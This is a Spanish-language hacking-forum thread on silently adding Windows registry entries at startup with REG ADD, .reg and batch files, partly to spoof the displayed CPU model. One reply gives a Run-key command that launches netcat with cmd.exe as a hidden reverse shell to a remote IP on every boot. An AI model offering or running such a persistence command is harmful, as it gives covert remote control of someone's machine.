Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de
Autor
|
Tema: DESENSAMBLAR EL REGISTRO DE WIN (Leído 5,377 veces)
|
rocketman2004
|
HOLA AMIGOS, TENGO UNA ENTRADA O CLAVE DE REGISTRO Y LA PUSE A QUE SE EJECUTARA CADA VEZ QUE INCIE MI SISTEMA, ALGO ASI COMO UN PARCHE... MI PREGUNTA ES COMO DESEMSAMBLO EL REGISTRO DE WIN ME O XP PARA QUE CUANDO SE EJECUTE ESTA ENTRADA NO ME APAREZCA LA VENTANA DE:"¿ESTA SEGURO QUE DESEA AGREGAR LA INFORMACION EN C:/ / ETC ETC?? AL REGISTRO DE WINDOWS?? Y LUEGO DE QUE ACEPTE SALGA LA OTRA VENTANA QUE DICE:"SE HA CONSEGUIDO INTRODUCIR LA INFORMACION EN EL REGISTRO" QUE PARTE DEL REGISTRO DEBO DESEMSAMBLAR Y COMO HAGO PARA QUE NO APAREZCAN NINGUNA DE ESTAS VENTANAS Y SE INTRODUZCA LA INFORMACION EN EL REGISTRO AUTOMATICAMENTE??? AYUDA POR FA 
|
|
|
|
|
|
|
|
|
jvchino
Solo soy un
Ex-Staff
La felicidad no es una meta, es un camino.
|
Puedes agregar o borrar datos del registro mediante varias formas: - Mediante el editor de registro (Regedit) - Con un archivo *.reg - Con un archivo *.inf - Con un archivo *.vbs - Desde el DOS (Win Xp) Los tres últimos no te piden confirmación. Lee esto: http://foro.elhacker.net/index.php/topic,14472.0.htmlY si tienes alguna pregunta... hazla. Saludos.
|
|
|
|
|
|
Si ayudo a una sola persona a tener esperanza, no habré vivido en vano.
No, nada llega tarde, porque todas las cosas tienen su tiempo justo, como el trigo y las rosas
|
|
|
|
dxr
|
Creo q tu buscas eso: c:\winnt\system32\regsvr32.exe /s tuclave 
|
|
|
|
|
|
Hacer preguntas concretas, claras y aportando toda la documentación necesaria. De lo contrario, no tendreis una respuesta clara.
|
|
|
|
zhyzura
|
un ejemplo de como crear un archivo bat que te agregue una entrada al registro para que se ejecute en cada inicio del sistema el netcat seria asi: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -d -e cmd.exe 10.10.0.156 9090"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)
|
|
|
|
|
|
|
|
|
rocketman2004
|
YO HIZE UN ARCHIVE .REG PERO CUANDO INTRODUCE LA INFORMACION EL REGISTRO ME APARECE UNA VENTANA DE CONFIRMACION..Y NO QUIERO QUE SALGA ESA VENTANA. NO SE COMO HACERLO....ME PODRIAN EXPLICAR MEJOR GRACIAS..
|
|
|
|
|
|
|
|
|
rocketman2004
|
COMO AGREGO ESA INFORMACION MEDIANTE DOS??? DE VERDAD NO SE, AYUDA PLEASE.
|
|
|
|
|
|
|
|
|
jvchino
Solo soy un
Ex-Staff
|
zhyzura ya te dio un ejemplo. Asumo que tienes Win XP. Te hago una comparación entre un *.reg y su equivalente desde la consola DOS Si un archivo reg tiene esto: REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar] "BackBitmapIE5"="c:\\milogo.bmp" Su equivalente en la consola DOS sería: (en una sola línea) REG ADD HKEY_CURRENTE_USER\Software\Microsoft\Internet Explorer\Toolbar /v BackBitmapIE5 /d "c:\\milogo.bmp" Puedes incluir la línea anterior en un archivo bat, y que éste se ejecute al iniciar windows. Si quieres más información lee aquíSaludos.
|
|
|
|
|
|
No, nada llega tarde, porque todas las cosas tienen su tiempo justo, como el trigo y las rosas
|
|
|
rocketman2004
|
saludos ahora si te voy entendiendo pero tengo mi duda....
estoy en esta parte del registro:
KHEY_LOCAL_MACHINE HARDWARE DESCRIPTION CENTRAL PROCESSOR 0
LUEGO ME UBICO EL VALOR ALFANUMERICO DE NOMBRE: ProcessorNameString, EL CUAL DICE: Intel(R) Celeron(R) CPU 1.70GHz
YO LO QUE QUIERO ES EDITAR ESE NOMBRE Y ME APAREZCA : Intel Pentium IV 1.70GHz
estonces tendria que crear el archivo. bat que tu cices y que cuando sereinicie el sistema se edite esa linea automaticamente. COMO HARIA ESO CON EL ARCHIVO. BAT??? PUEDES AYUDARME??
yo la logro editar desde el registro y cuando hago click derecho sobre el icono de mi pc en el escritorio de windows, en las propiedadesdel sistema me aparece : Intel Pentium IV 1.70GHz (la informacion que cambie), eso es lo que yo quiero que haga el sistema autmaticamnete siempre que lo encienda.... disculpa la molestia pero es que apenas estoy aprendiendo a relacionarme con el registro de win ya que eso no lo enseñan en la universidad.
|
|
|
|
|
|
|
|
|
rocketman2004
|
EN OTRAS PC EN VALOR DE: ProcessorNameString NO EXISTE Y ENTONCES DEBE CREARLO Y DESPUES INTRODUCIRLELA INFORMACION QUE QUIERO QUE ME MUESTRE...... COMO CREARIA ESE VALOR CON EL ARCHIVO.BAT????
|
|
|
|
|
|
|
|
|
jvchino
Solo soy un
Ex-Staff
|
Parece que no cumpliste con la tarea de leer el enlace que te dejé... pues allí hubieras leído: "... en caso de que la clave no existiese la craría también..."
Es decir si la clave no existe entonces AUTOMATICAMENTE la crea, luego le agrega un valor y finalmente le da un dato a dicho valor. Todo eso con una sola línea.
REG ADD HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\CENTRAL PROCESSOR\0 /v ProcessorNameString /d "Intel Pentium IV 1.70GHz"
Saludos.
|
|
|
|
|
|
|
|
|
rocketman2004
|
gracias jvchino, si yo lei alunas cosas en el manual y de hecho lo intente de hacer de una forma parecida pero el .bat no me actualizaba la info en el registro,dejame ver intentarlo de nuevo con tu sintaxis.gracias de nuevo. cualquier cosa te pregunto de nuevo.
|
|
|
|
|
|
|
|
|
rocketman2004
|
gracias amigos :jvchino, zhyzura, y derek ya puede hacer el archivo y ahora si me actualiza la informacion en el registro.. era que habia dejado un espacio que no debia dejarlo y por eso el archivo no se ejecutaba correctamente. See you!
|
|
|
|
|
|
|
|
|
komax8475
|
disculpen..estuve leyendo lo anterior e hice un archivo llamado p4.bat y lo coloque en C:/ con la informacion siguiente:
REG ADD HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 /v ProcessorNameString /d "Intel Pentium IV 1.70GHz"
tengo windowsxp. Y si modifica la informacion del procesador pero al reiniciar la PC vuelve al estado original..Gracias por su ayuda.
|
|
|
|
|
|
|
|
|
|
|